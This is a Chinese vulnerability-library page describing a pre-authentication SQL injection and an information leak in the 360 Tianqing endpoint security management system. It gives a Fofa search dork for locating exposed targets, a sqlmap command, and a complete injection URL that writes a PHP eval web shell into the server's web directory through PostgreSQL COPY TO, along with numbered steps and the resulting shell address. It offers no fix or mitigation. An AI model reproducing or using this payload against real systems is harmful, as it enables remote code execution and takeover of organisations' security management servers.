360天擎终端安全管理系统SQL注-漏洞文库小世界-安全文库-NGC660 安全实验室

360天擎终端安全管理系统SQL注

360天擎终端安全管理系统前台SQL注入

漏洞描述

天擎存在SQL注入攻击者可以通过漏洞上传木马
Fofa Dork:

app="360天擎终端安全管理系统"

漏洞复现

sqlmap -u https://xxx.xxx.xxx.xxx:8443/api/dp/rptsvcsyncpoint?ccid=1 --dbms PostgreSQL

16274575454650
利用注入写shell:

https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to 'C:\Program Files (x86)\360\skylar6\www\1.php';drop table O;--  

利用条件和过程:

  1. 通过安装包默认安装的一般都有管理员权限,因此该注入点可尝试写shell
  2. 通过注入点,创建一张表O
  3. 为表O添加一个新字段T并且写入shell内容
  4. Postgres数据库使用COPY TO把一个表的所有内容都拷贝到一个文件(完成写shell)
  5. 删除表O

16274594403921
shell地址: https://ip:8443/1.php

360天擎终端安全管理系统信息泄露

访问如下链接即可发现相关敏感信息:

http://192.168.1.1/api/dbstat/gettablessize 

16275199063143

参考链接

http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%A4%A9%E6%93%8E/%E5%A4%A9%E6%93%8E%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5.html

请登录后发表评论

    请登录后查看回复内容